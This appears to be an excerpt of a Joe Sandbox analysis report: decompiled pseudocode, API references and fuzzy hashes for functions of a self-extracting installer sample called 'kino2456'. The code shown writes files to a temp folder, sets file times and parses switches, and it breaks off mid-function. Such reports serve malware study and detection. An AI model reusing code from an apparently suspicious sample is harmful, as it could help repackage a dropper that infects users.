0x00fc4daa
0x00fc4da3
0x00fc4da3
0x00fc4da3
0x00fc4db5
0x00fc4dbb
0x00fc4dbd
0x00000000
0x00fc4dc3
0x00fc4dc5
0x00000000
0x00fc4dc5
0x00fc4dbd
0x00fc4d2a
0x00fc4d2a
0x00fc4d2d
0x00000000
0x00000000
0x00000000
0x00fc4d2d
0x00fc4cf8
0x00fc4cfd
0x00fc4d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00FC4DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00FC4DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC4D36, 00FC4DE3

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 3625706803-1610346413
Opcode ID: 7dbe57dd5e8fb9ef1c03af609467289b3477a90de7f183f89b3ac9e04d432116
Instruction ID: fc184d143f4a0b4d0cd8cd2c6a6b6ac0a85cc724b314a9d28e42d7ffcc479620
Opcode Fuzzy Hash: 7dbe57dd5e8fb9ef1c03af609467289b3477a90de7f183f89b3ac9e04d432116
Instruction Fuzzy Hash: 04410636A041078ACB25AF28DF6BFF573A5AB45320F04466CD88397185DA35FD4AF750

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC4C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0xfc8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0xfc8d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00fc4c40
0x00fc4c4a
0x00fc4c8d
0x00000000
0x00fc4c70
0x00fc4c70
0x00fc4c7e
0x00fc4c86
0x00000000
0x00000000
0x00000000
0x00fc4c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00FC4C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FC4C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00FC4C7E

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 9eb1ecbf0d937a33eaa23bcbeb679c19431d36473a8619e8a6833ec3fc522935
Instruction ID: e44f112fff0eba6a1f64a518f042ba897157fafae5ffd3a54feb50f4b928fbff
Opcode Fuzzy Hash: 9eb1ecbf0d937a33eaa23bcbeb679c19431d36473a8619e8a6833ec3fc522935
Instruction Fuzzy Hash: 32F0BB7290110D6F9B14DFB5CE5BEBB77ACEB44355744052FA416C2060EA30F918FB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FC487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00FC487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E00FC490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00fc4880
0x00fc488c
0x00fc4894
0x00fc48a0
0x00fc48c9
0x00fc48ce
0x00fc48a2
0x00fc48a8
0x00fc48b7
0x00fc48bc
0x00fc48aa
0x00fc48ac
0x00fc48ac
0x00fc48a8
0x00fc48de
0x00fc48e7
0x00fc490b
0x00fc48ee
0x00fc48f0
0x00000000
0x00fc4902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00FC4A23,?,00FC4F67,*MEMCAB,00008000,00000180), ref: 00FC48DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00FC4F67,*MEMCAB,00008000,00000180), ref: 00FC4902

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 358cb98ae24bba0671eb7843fa35f37e9a5871b08030e67afdc66ebf3c36b781
Instruction ID: 2fff5782eb41507814e5bd2af74c913d34650e1a207d3dd4f53244c3ad121220
Opcode Fuzzy Hash: 358cb98ae24bba0671eb7843fa35f37e9a5871b08030e67afdc66ebf3c36b781
Instruction Fuzzy Hash: E0016DA3E1257526F32440294D9AFB7551CCBDA734F1B0338BDEAE75D1D564AC04A1E0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FC4AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0xfc858c; // 0x270
				_t9 = E00FC3680(_t20);
				if( *0xfc91d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0xfc8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0xfc9400; // 0xb8200
							_t15 = _t14 + _t25;
							 *0xfc9400 = _t15;
							if( *0xfc8184 != 0) {
								_t21 =  *0xfc8584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xfc93f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00fc4ad5
0x00fc4adb
0x00fc4ae7
0x00fc4aee
0x00fc4b05
0x00fc4b0d
0x00fc4b14
0x00fc4b1a
0x00fc4b1c
0x00fc4b21
0x00fc4b2a
0x00fc4b2f
0x00fc4b31
0x00fc4b39
0x00fc4b54
0x00fc4b54
0x00fc4b39
0x00fc4b2f
0x00fc4b0f
0x00fc4b0f
0x00fc4b0f
0x00fc4b5e
0x00fc4ae9
0x00fc4aed
0x00fc4aed

APIs

Part of subcall function 00FC3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00FC369F
Part of subcall function 00FC3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC36B2
Part of subcall function 00FC3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC36DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00FC4B05

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: dc4d16a1800ea83ab6d044a7a9380d9d104242c57198a789c281470ec25f3d86
Instruction ID: 0fc94ab27e70696a112b26d7ea843ddbc640550eacd5ec2cb0eaae7081412614
Opcode Fuzzy Hash: dc4d16a1800ea83ab6d044a7a9380d9d104242c57198a789c281470ec25f3d86
Instruction Fuzzy Hash: E801963164020A9BD7148F58DE1BFA27759F784775F088229F939971E1CB70EC12EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FC658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0xfc8b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0xfc8b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E00FC16B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00fc6592
0x00fc6594
0x00fc6596
0x00fc6598
0x00fc6598
0x00fc659b
0x00fc659b
0x00fc659d
0x00fc659e
0x00fc65a2
0x00fc65a4
0x00fc65a9
0x00fc65b2
0x00fc65b6
0x00fc65ba
0x00fc65c3
0x00fc65c5
0x00fc65c8
0x00fc65c8
0x00fc65c3
0x00fc65c9
0x00fc65cc
0x00fc65d2
0x00fc65d1
0x00fc65d1
0x00000000
0x00fc65dc
0x00000000

APIs

CharPrevA.USER32(00FC8B3E,00FC8B3F,00000001,00FC8B3E,-00000003,?,00FC60EC,00FC1140,?), ref: 00FC65BA

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: aeaddacdefd32057796410d1693c3b4f5f517ed3bd2290b33abe90d939c1fbfd
Instruction ID: f1f9e1a99accdcba18aafc5a72dcdc113c486809d36fb793ece0cebf22295ab9
Opcode Fuzzy Hash: aeaddacdefd32057796410d1693c3b4f5f517ed3bd2290b33abe90d939c1fbfd
Instruction Fuzzy Hash: 84F0427350C2525BD335051D9A85F66BFDD9BCA360F3C095EF8DAC3205CA555C45B3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FC621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E00FC597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E00FC44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0xfc9124 = E00FC6285();
					_t9 = 0;
				}
				return E00FC6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00fc6229
0x00fc6230
0x00fc6247
0x00fc626a
0x00fc6272
0x00fc6249
0x00fc6255
0x00fc625f
0x00fc6264
0x00fc6264
0x00fc6284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00FC623F

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00FC4554

Part of subcall function 00FC6285: GetLastError.KERNEL32(00FC5BBC), ref: 00FC6285

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: bd91cf4ae994e79962d2a1d9730f259eb333d896dca2424c37ee149688cc51fb
Instruction ID: b56777b1193ac640da3d38552055071180415af5972dd676d2a9c8d75e69c186
Opcode Fuzzy Hash: bd91cf4ae994e79962d2a1d9730f259eb333d896dca2424c37ee149688cc51fb
Instruction Fuzzy Hash: 9AF0B4B16482096BDB50EB748F07FBA32A8DB44740F40006DB985D7091DD789944A650

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC4B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0xfc8d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0xfc8d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0xfc8d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0xfc8d60)) = 1;
				 *((intOrPtr*)(_t15 + 0xfc8d68)) = 0;
				 *((intOrPtr*)(_t15 + 0xfc8d70)) = 0;
				 *((intOrPtr*)(_t15 + 0xfc8d6c)) = 0;
				return 0;
			}

0x00fc4b66
0x00fc4b74
0x00fc4b98
0x00fc4ba0
0x00000000
0x00fc4bac
0x00fc4ba4
0x00000000
0x00fc4ba4
0x00fc4b78
0x00fc4b7e
0x00fc4b84
0x00fc4b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00FC4FA1,00000000), ref: 00FC4B98

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: abc4c97f5f42ed7f12dcd09e53bfd262ae8fa734f7fc942523b5dc7f340ae745
Instruction ID: a199f53667b4211606b7c79d44ec328110674c918eb9ce7e6c90a60196846743
Opcode Fuzzy Hash: abc4c97f5f42ed7f12dcd09e53bfd262ae8fa734f7fc942523b5dc7f340ae745
Instruction Fuzzy Hash: 60F0F471940B099E87618E399E03F53BBE4AAD63E13140D2E946FD2190DB31B942FBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC66AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC66AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x00fc66b1
0x00fc66ba
0x00fc66c7
0x00fc66bc
0x00fc66be
0x00fc66be

APIs

GetFileAttributesA.KERNELBASE(?,00FC4777,?,00FC4E38,?), ref: 00FC66B1

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a89d929eab25ee13bdb51f29ac5d20e48e15a9654902b016b84a97d30d03055a
Instruction ID: 923d1ff069a9b0ca536806d5d6974e7e2ddaf569c24122e53506fe4d670dee1e
Opcode Fuzzy Hash: a89d929eab25ee13bdb51f29ac5d20e48e15a9654902b016b84a97d30d03055a
Instruction Fuzzy Hash: 7EB09276666449426A2006316D2AA563841A6C123A7E41B94F032C11E0CA3ED846F004

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC4CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00fc4caa
0x00fc4cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00FC4CAA

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 34c754da8b32c224c4972fd0f8f65695325da228e23fc8c97779fd6ab42d86a5
Instruction ID: 1d32af8afaa185ca2500993780e99b756739152d7ecd09578967b777e5ca77e1
Opcode Fuzzy Hash: 34c754da8b32c224c4972fd0f8f65695325da228e23fc8c97779fd6ab42d86a5
Instruction Fuzzy Hash: 71B0123208420CB7CF001FC2EC0AF853F1DE7C47A5F140040F60C460508A72A4109696

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FC4CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00fc4cc8
0x00fc4ccf

APIs

GlobalFree.KERNELBASE ref: 00FC4CC8

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 842d62c0c8cf9dff872b3c0ddd818b2f42d3abb3576ce038ba4788f7c9028983
Instruction ID: fb4433fa766f4dd4821342bfa6e23bbad72e2d399c0f8a51905e64ce9ecc7070
Opcode Fuzzy Hash: 842d62c0c8cf9dff872b3c0ddd818b2f42d3abb3576ce038ba4788f7c9028983
Instruction Fuzzy Hash: 30B0123104010CB78F001B42ED09C453F1DD6C02A47000050F50C420218B33A8119585

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00FC5C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00FC5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00FC6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00FC6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0xfc8004; // 0xd6d6fca6
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E00FC597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E00FC44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0xfc9124 = E00FC6285();
									_t75 = 0;
								}
								return E00FC6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E00FC44B9(0, 0x521, 0xfc1140, 0, 0x40, 0);
												_t85 =  *0xfc8588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E00FC667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E00FC667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00FC5C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00FC1680(0xfc8c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E00FC667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E00FC667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0xfc8a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00FC5C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0xfc8b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0xfc8a3a;
																}
																E00FC1680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E00FC658A(_t218, 0x104, 0xfc1140);
																if(E00FC31E0(_t218) != 0) {
